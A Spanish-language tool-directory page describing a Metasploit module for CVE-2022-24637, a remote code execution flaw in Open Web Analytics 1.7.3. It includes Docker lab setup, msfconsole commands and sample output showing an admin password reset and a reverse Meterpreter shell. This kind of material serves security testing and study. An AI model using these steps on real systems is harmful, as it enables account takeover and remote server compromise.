Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-24637 — Open Web Analytics 1.7.3 - Ejecución Remota de Código | Kitploit
Herramientas/GitHubGitHub/pflegusch/cve-2022-24637
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubpflegusch/cve-2022-24637

CVE-2022-24637

Open Web Analytics 1.7.3 - Ejecución Remota de Código

Ver Repositorio
4hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Aplicación vulnerable

Open Web Analytics (OWA) anterior a 1.7.4 permite que un atacante remoto no autenticado obtenga información confidencial del usuario, que puede usarse para obtener privilegios de administrador aprovechando los hashes de caché. Esto ocurre porque los archivos generados con `<?php (en lugar de la secuencia prevista "<?php) no son procesados por el intérprete de PHP.

Pasos de verificación

  1. Inicie una instancia vulnerable de OWA usando docker

    • Descargue https://github.com/Pflegusch/CVE-2022-24637/blob/main/deployment/docker-compose.yml
    • Inicie los contenedores: docker compose up -d
    • Abra http://127.0.0.1:80/
    • Siga los pasos de instalación usando las variables de entorno del archivo docker-compose.yml
      • URL pública: http://127.0.0.1/
      • Host de la base de datos (docker inspect <db-container> y obtenga IPAddress, p. ej. 172.22.0.2)
      • Puerto de la base de datos: 3306
      • Nombre de la base de datos: owa
      • Usuario de la base de datos: owa
      • Contraseña de la base de datos: Demo12+#
      • Continuar
      • Dominio del sitio: http://127.0.0.1
      • Nombre del administrador: admin
      • Correo electrónico: [email protected]
      • Contraseña: Demo12+#
      • Continuar
  2. Inicie msfconsole

  3. use exploit/multi/http/open_web_analytics_rce

  4. set RHOSTS 127.0.0.1

  5. set RPORT 80

  6. set SSL false

  7. set LHOST 172.22.0.1 -> esto debe ser la IP del puente que se creó con el comando docker compose up -d

  8. check

  9. run

Opciones

Password

Al explotar el objetivo, la contraseña del usuario atacado se sobrescribirá con esta contraseña.

Username

El usuario que será el objetivo de este exploit.

Opciones avanzadas

SearchLimit

El exploit funciona recuperando un valor temp_passkey de un archivo de caché que se crea para cada usuario al intentar iniciar sesión con él. Dado que el directorio /owa-data/caches/ es de acceso público, podemos recuperar estos archivos de caché. La ruta exacta de los archivos de caché depende del user_id y se puede calcular con él. Esta opción define cuántas rutas calculadas, comenzando desde 0, deben comprobarse en busca de archivos de caché con el valor temp_passkey.

Escenarios

Versión 1.7.3 usando el despliegue docker anterior

root@kitploit:~
msf6 exploit(multi/http/open_web_analytics_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/open_web_analytics_rce) > set LHOST 172.22.0.1
LHOST => 172.22.0.1
msf6 exploit(multi/http/open_web_analytics_rce) > run

[*] Started reverse TCP handler on 172.22.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Open Web Analytics 1.7.3 is vulnerable
[+] Connected to http://127.0.0.1/ successfully!
[*] Attempting to find cache of 'admin' user
[+] Found temporary password for user 'admin': 85038e7e9f541ae4c4939d3044e628a5
[+] Changed the password of 'admin' to 'pwned'
[+] Logged in as admin user
[*] Creating log file
[+] Wrote payload to file
[*] Sending stage (39927 bytes) to 172.22.0.3
[+] Deleted QY0yivK4.php
[*] Meterpreter session 1 opened (172.22.0.1:4444 -> 172.22.0.3:55434) at 2023-03-15 01:28:54 +0100
[+] Triggering payload! Check your listener!

meterpreter > pwd
/var/www/html/owa-data/caches
meterpreter > getuid
Server username: www-data
meterpreter >
Descargar herramienta